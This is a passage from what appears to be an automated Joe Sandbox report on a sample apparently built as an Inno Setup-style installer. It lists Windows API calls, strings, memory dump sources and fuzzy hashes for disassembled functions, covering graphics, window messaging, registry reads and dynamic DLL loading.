                                                                                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                            • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                            • String ID:
                                                                                            • API String ID: 2222416421-0
                                                                                            • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                            • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                              • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                            • TranslateMessage.USER32(?), ref: 004573B3
                                                                                            • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1007367021-4230553315
                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                            • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                              • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                              • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                            • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                            • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                            • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                            Strings
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                            • CreateAssemblyCache, xrefs: 00459836
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                            • Fusion.dll, xrefs: 004597DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                            • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                            APIs
                                                                                              • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                            • GetFocus.USER32 ref: 0041C168
                                                                                            • GetDC.USER32(?), ref: 0041C174
                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                            • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3303097818-0
                                                                                            • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                            • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                            • 6FA82980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                              • Part of subcall function 004107F8: 6FA7C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                            • 6FAECB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                            • 6FAEC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                            • 6FAECB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                            • 6FA80860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$A80860A82980C400C740
                                                                                            • String ID:
                                                                                            • API String ID: 265698141-0
                                                                                            • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                            • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                            • API String ID: 47109696-2530820420
                                                                                            • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                            • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                            APIs
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 1458357782-0
                                                                                            • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                            • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 004233AF
                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                            • SetCursor.USER32(00000000), ref: 00423413
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1770779139-0
                                                                                            • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                            • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                            • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                            • API String ID: 667068680-2254406584
                                                                                            • Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
                                                                                            • Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
                                                                                            • Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
                                                                                            • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                            • API String ID: 190572456-212574377
                                                                                            • Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
                                                                                            • Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
                                                                                            • Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                                            • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                              • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                              • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                              • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                            • API String ID: 142928637-2676053874
                                                                                            • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                                            • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                            • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                            • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
